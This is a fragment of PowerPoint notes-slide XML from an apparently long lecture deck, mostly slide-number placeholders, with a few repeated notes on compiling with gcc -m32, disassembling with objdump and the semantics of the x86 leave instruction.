        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215940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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117532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3E194-9CD8-5141-A084-FACF5FE3CE7A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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7628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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="551891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C0C6E-92FD-E543-A864-B05FD6DAFA38}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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914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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
          </a:p>
          <a:p>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149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11809614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Segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Fault!</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186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1023706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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="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187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71210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0919A-7999-1344-A77D-8550F76A0C90}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>188</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5106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5C90E-F172-ED4A-9B27-405EC72B29A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>189</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24501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A232C-859C-7944-BBC3-4E45C70EADFE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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8384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511EB-C2F5-A145-B335-3AB86E8010F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>192</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68162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511EB-C2F5-A145-B335-3AB86E8010F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>193</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58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481D4-4C3B-774A-9C43-56765108CB42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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03058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E3C41-3C8B-EF42-AF77-9C12A39B27A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71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10565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45D5D-2BBA-8A4E-8E78-F565E6258773}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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36929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398F7-9886-A24A-B54B-F2557141BB12}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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7804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3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>198</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4478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3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>202</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53243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3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>204</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89925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86F2D-A3A4-C746-B822-03656D89F2BB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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1013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2E3B3-851D-104F-B830-91D2A6B0ABBA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0105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3B073-1E93-A848-867E-A6AEEA45BEF7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>207</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96868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099EF-3E8D-9742-97F2-E1FA441544DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721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449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52140-418B-B94E-A94B-24468F1C4D8A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027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62059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60765F-90AA-EE46-823F-EF56F43F7D5E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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6981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E9F72-5832-AC4E-9B9A-D5D0A3C27AAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>213</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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096115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48129-E60A-ED49-BD6F-F910058D55DC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>215</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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32783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F2342-7D86-474E-903B-2BF470BF4B50}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>216</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109875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9875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441313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80F9EE-ABF9-A140-BB1E-40D304745E47}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>217</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110080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0080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161571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67B9D-9264-1947-AAD4-03521D348AF1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>218</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110285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0285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742059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89057-93FD-4748-92C7-3F80CD4C490C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>219</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110489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0489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043422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F4A43-03A1-884B-83B1-FFFDBE2DF729}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>220</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110694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0694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330745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57F10-BFF4-5A47-B5D6-A8A176209894}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>222</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227778" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227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03693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315F9-C31A-624A-9D47-E238F8E3A613}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>223</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228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943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21A61-84E2-0240-BA67-5A5A0E89159B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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60269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1631D-F779-1B47-BD13-B0E0DFECE375}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>225</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167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56342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60457-7160-5149-AD8A-7CCE165DFA80}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>226</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57036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5E9AB-E120-0F49-A091-50F81B09CB24}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>228</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229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0294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57D3A-5C9C-4249-AAC6-3EF462A4DE19}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>229</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230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7662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B691D-35A2-F946-A6E3-133115CC8A10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>230</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231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51806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5C354A9F-5682-3446-838B-97965C79B6DB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>231</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690078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FD702A9-199E-8842-A6BA-D84903D3B018}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>232</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310688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F91307F-3418-3541-9126-02EFF585F244}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>233</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90880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6D0BA-B202-3540-B9FB-0822A7C64046}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>235</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110899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0899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07973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A579D-E745-7D4E-82EC-FF06259005CF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>236</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111104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1104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20971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94DB0-638B-B14B-AA4D-B1DCA135860E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1016834" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1016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012051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664D2-B5C1-A542-B9CF-3C5D91B08467}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>237</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111309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1309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2122741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E14A5B-7643-634E-98BB-52F566DF0819}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>238</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111513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1513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656443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5C80E-0050-7440-91DD-7708E9697E53}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>239</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111718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1718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611804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00187-1A95-0C46-9504-1272CEE643CE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>240</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111923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1923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986247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14AD8-3053-A745-B0D6-C3FDBD417992}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>241</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112128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2128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133702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E6FB4-30E9-CF46-A0C7-F1C271B68F46}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>242</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112333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2333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0225689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A6099-85F4-F94A-A0F1-153AA6D5F61A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>243</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112537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2537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108321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90CE1-BA8D-BA4B-80B6-E720D7771979}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>244</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112742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2742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6723068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39116-6842-924A-A7CE-DDA575A70DA5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>245</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129474"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12947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669592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ECC22-AED7-3646-BB4B-243DD2E9150E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>246</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827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FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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77803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B6693F-A9C2-A34A-8B75-C92F0DF93E52}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>247</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113152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3152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2824105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589DC-D40D-5949-BE5B-363D7E189410}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>248</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113561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3561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1348807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5C357-9C52-F04C-BE02-F248699357F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>249</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113766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3766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0939499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35D9F-8422-9440-B1EF-ECDD725363A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113971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3971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463802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C16C8-F92F-3F4D-B118-51C6788CC8FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114176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4176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350503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738CF-359D-EE46-A2FE-507409A27A82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>252</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114381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4381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3176140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C6258-C9B7-384F-9C48-758DC5D2FE42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>253</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114585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4585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3534674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277F35-681B-AE48-960D-5318E45B4E4E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>254</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118067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8067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7754217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8FC63-C28E-DE42-8F74-1EF2A7D0EDF3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>255</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117248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7248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2452558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E8060-D11E-9F46-BEB7-5BB3173F4724}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>256</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117453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7453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4258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1808025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51318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92767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52600"/>
            <a:ext cx="4267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58200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1E546586-0967-264B-9B68-19633807768E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500151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752600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
